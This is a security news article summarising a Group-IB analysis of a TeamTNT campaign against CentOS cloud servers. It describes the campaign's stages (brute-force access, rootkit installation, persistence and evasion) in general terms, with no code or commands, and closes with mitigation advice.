Recent developments in cloud computing have made IT operations more straightforward but have also brought about new security challenges.
Threat actors like TeamTNT exploit vulnerabilities in cloud services (AWS, Azure, etc.) and containerization tools (Docker, Kubernetes) to steal credentials, install backdoors, mine cryptocurrency, and compromise public resources.
TeamTNT’s sophisticated attacks started in 2019 and continued in 2023 and 2024, despite their disappearance from social media in 2022.
Their ongoing attacks target CentOS VPS cloud infrastructures with a multi-stage process, which begins with SSH brute force attacks to gain unauthorized access.
Once inside, they upload malicious scripts that disable security, delete logs, modify system files, and also kill existing cryptocurrency mining processes, remove Docker containers, and redirect DNS to Google’s servers.
To maintain persistence and control, the attackers install the Diamorphine rootkit and use custom tools, and they lock down the system by modifying file attributes, creating a backdoor user, and erasing command history to hide their activities.
A new campaign targeting VPS cloud infrastructures based on CentOS operating systems has been discovered, where the attacker gains initial access via SSH brute-force attack and uploads a malicious script.
The script checks for existing miners and disables security measures like firewalls and SELinux. It also searches for cryptocurrency mining processes and kills them using various signatures.
It interacts with Docker to remove containerized miners and changes DNS configuration. A custom tool named “tntrecht” is loaded to modify permissions of legitimate processes.
The script also establishes persistence by modifying crontab files to execute malicious code every 30 minutes, and downloads a malicious payload from a remote server and implants it into the crontab, disguising it with a timestamp to evade detection.
It deploys a rootkit named Diamorphine, which is a kernel module designed to hide malicious activities and grant the attacker root privileges. The rootkit’s key features include silent execution, process hiding/unhiding, privilege escalation, and file/directory invisibility.
The threat actor, having compromised the system, further enhanced their control by locking down the system’s files and disabling recovery attempts using the chattr command and the tntrecht tool.
They secured persistent access by installing a backdoor user with root privileges and configuring SSH authentication via a public key. To avoid detection, they modified the SSH port, firewall rules, and cleared the bash history.
The analysis by Group IB suggests that a sophisticated threat actor, likely TeamTNT, executed a highly automated and meticulously planned attack, which included gaining initial access, preventing recovery attempts, and causing significant damage.
To mitigate similar threats, organizations are advised to implement robust security measures such as applying security patches, configuring firewalls, using strong authentication methods, restricting access, and employing intrusion detection and file integrity monitoring tools.